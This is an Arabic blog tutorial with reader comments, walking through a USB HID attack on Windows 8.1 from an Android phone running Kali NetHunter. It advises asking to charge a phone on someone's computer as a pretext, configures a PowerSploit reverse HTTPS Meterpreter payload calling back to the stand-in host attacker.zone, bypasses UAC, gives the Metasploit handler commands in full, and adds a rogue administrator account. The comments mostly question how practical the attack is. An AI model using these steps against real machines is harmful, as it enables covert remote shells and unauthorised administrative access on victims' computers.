اختراق نظام Windows 8.1 بهجوم USB HID
الكاتب: صبري صالح | يوم: 28 فبراير, 2015 | التعليقات: 5 | القراءات: - عدد المشاهدات 38٬889
مقدمة
من فترة طويلة و أنا أريد استخدام نظام Kali – NetHunter المعدل للعمل مع نظام أندرويد على عدة اجهزة (Nexus 4, 5, 7, 10, OnePlusOne) وسيتم دعم المزيد مستقبلا. توزيعة NetHunter تحمل في قلبها توزيعة Kali وتستطيع أن تعمل كل ما تعمله Kali. في نفس الوقت, هناك إضافات و تسهيلات جعلت الاختراق أسهل بكثير وهناك العديد قادم في هذه التوزيعة الواعدة من تطوير offensive-security. هجوم اليوم هو HID أو Human Interface Device عن طريق استغلال توصيل الهاتف المحمول بالكمبيوتر وهذا شائع جدا ويسهل عليك أن تطلب شحن هاتفك من أي أحد يملك جهاز كمبيورت وغالبا ستقابل ترحابا بكل سهولة. هناك تطبيقات غير محدودة لهذا الهجوم وسنعرض اليوم إحداها.
الشرح سيكون على جهاز OnePlusOne لكنه يسري على جميع الاجهزة المدعومة
خطوات الاختراق
سأفترض مسبقا بأنك ملم بالمصطلحات التقنية التي ذكرت وسأتضطرق لتعريف الجديد منها في موضوعي.
1. تشغيل الأباتشي
اختر NetHunter Home Launcher
ثم اسحب الشاشة من اليسار إلى اليمين و اختر Kali Service Control
ثم فعل الأباتشي من القائمة
2. إعدادات هجوم الـ USB HID
سأحاول وضع الخطوات بشكل مفصل كي نستفيد منه في شروحات قادمة -إن شاء الله-
2.1. جعل أندرويد في USB Debugging mode
من قائمة البرامج, اذهب إلى
Settings >> Developer options >> Android debugging
2.2. وصل الهاتف بالجهاز المراد اختراقه
إذا تم التوصيل بنجاح ستجد تنبيه الـ Debugging mode في شريط تنبيهات الهاتف وبدونه لن تنجح عملية الاختراق
2.3. إعدادت الـ PowerSploit
مشروع الـ PowerSploit واحد من أجمل المشاريع الموجودة على الساحة حاليا و يستخدم إمكانيات الـ PowerShell في اختراق الويندوز. تم استخدام أحد إمكانيات هذا المشروع في توزيعة NetHunter بشكل رائع.
هذا الاستغلال يسمح لك بتشغيل اتصال HTTPS عكسي على Metasploit meterpreter
هناك أربع إعدادات رئيسية
IP Address – LHOST : وهو عنوان الجهاز المشغل للميتاسبلويت handler سنتفترض أنه attacker.zone
Port – LPORT: وهو المنفذ الذي ينصت إليه الـ metasploit handler
Payload: وهنا أنت مخير بين الـ HTTP و HTTPS طبعا الأخير أفضل
URL to Payload : غاالبا يكون نفس عنوان الهاتف المحمول -لهذا قمنا بتفعيل الأباتشي سابقا- إلا إذا كنت قد أعدت الـ Payload في مكان أخر.
2.3.1. تخطي التحكم في صلاحيات المستخدم UAC
نقوم بهذه الخطوة كي نضمن تنفيذ الهجوم بأعلى صلاحيات ممكنة والتأكد من عدم منع النظام للهجوم من تنفيذ أوامر الـ PowerSploit
2.3.3. إعداد الميتاسبلويت وتنفيذ الهجوم
تشغيل الميتاسبلويت و الـ handler على الهاتف الجوال أو على الجهاز المحدد في جزء IP Address -LHOST سابقا والذي سيتصل عليه الـ Reverse HTTPS meterpreter
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST attacker.zone
set LPORT 4444
run
وأخيرا تنفيذ الهجوم
2.4. إعدادت الـ Windows CMD
هنا نفس طريقة الهجوم السابقة -ونفس الخطوات عدا تشغيل الأباتشي- لكن ينفذ أوامر تقوم أنت بإعدادها مسبقا و يقوم بتنفيذها على جهاز الضحية بدلا من تشغيل Reverse HTTPS meterpreter shell.
مثلا سنضيف مستخدم جديد اسمه KING ونجعله في مجموعة المدراء Administrators. طبعا تستطيع تعديل و إضافة ما تشاء من أوامر
شخصيا منبهر من سهولة و خطورة الهجوم و كيف أصبح جوالك ألة اختراق متحركة و بأقل الخطوات
تحياتي واحترامي
المهندس صبري صالح. مهندس حماية شبكات و أنظمة و فحصها معالجة و تحليل الأحداث الأمنية و المسؤول عن تطبيق معايير الـ ISO 27001 , يعمل في بيئات متعددة المنصات. حاصل على عدة شهادات تقنية.
التعليقات:
اترك تعليقاً | عدد التعليقات: (5)
جيد ولكن ماذا إذا كان الويندوز يعمل بصلاحيات عادية وليس من قائمة administrator فجميع ماذكرت لن ينجح
نشوف الموضوع بشكل منطقى بعيد عن الانبهارات
علشان ينجح الهجوم لازم يتوفر الاتى
1 – جهاز كمبيوتر شغال من غير باسوورد (الهدف)
2 – ميكونش حد قاعد جنبك (لأن كامل خطوات الهجوم بتكون واضحه على الشاشه تبع الكمبيوتر)
3 – الاتصال بنفس الشبكه الخاصه بالهدف
صراحه شايفه هجوم فاشل لانى لو متاح لى كل ده هشغل باتش persistent واحط على كامل الشبكه حتى لو رحت للجانب الاخر من الكره الارضيه وهيكون اسرع من الهجوم ده
ياريت لو شايف مميزات للهجوم تذكرها لأنى لو اخدت اللى انت قلته ده كتطبيق وحيد للهجوم بيكون ملهوش اى لزمه
فكرة رائعة لكن يلزمها شروط عدة لتطبيقها
بمعنى اخر ادا توفرت كل شروط يمكن تطبيق ماهو احسن منها
شاهدت فيديو من قبل عن الاختراق عن طريق تعريف ال يو اس بي . لما قرأت العنوان ضننت انها تشبهها لكنها ليست هي للاسف
فكرة الاختراق هو تلغيم الدرايفر الداخلي لل يو اس بي ب شل كود يمكنك من الاتصال كما هو بالنسبة لهذه التجربة
مباحث
اريد ان اعرف مايجب ان ادرس في شهادة CISSP ماهي الشهادات التي يجب ان ادرسها لاحصل على هده الشهادة وشكرا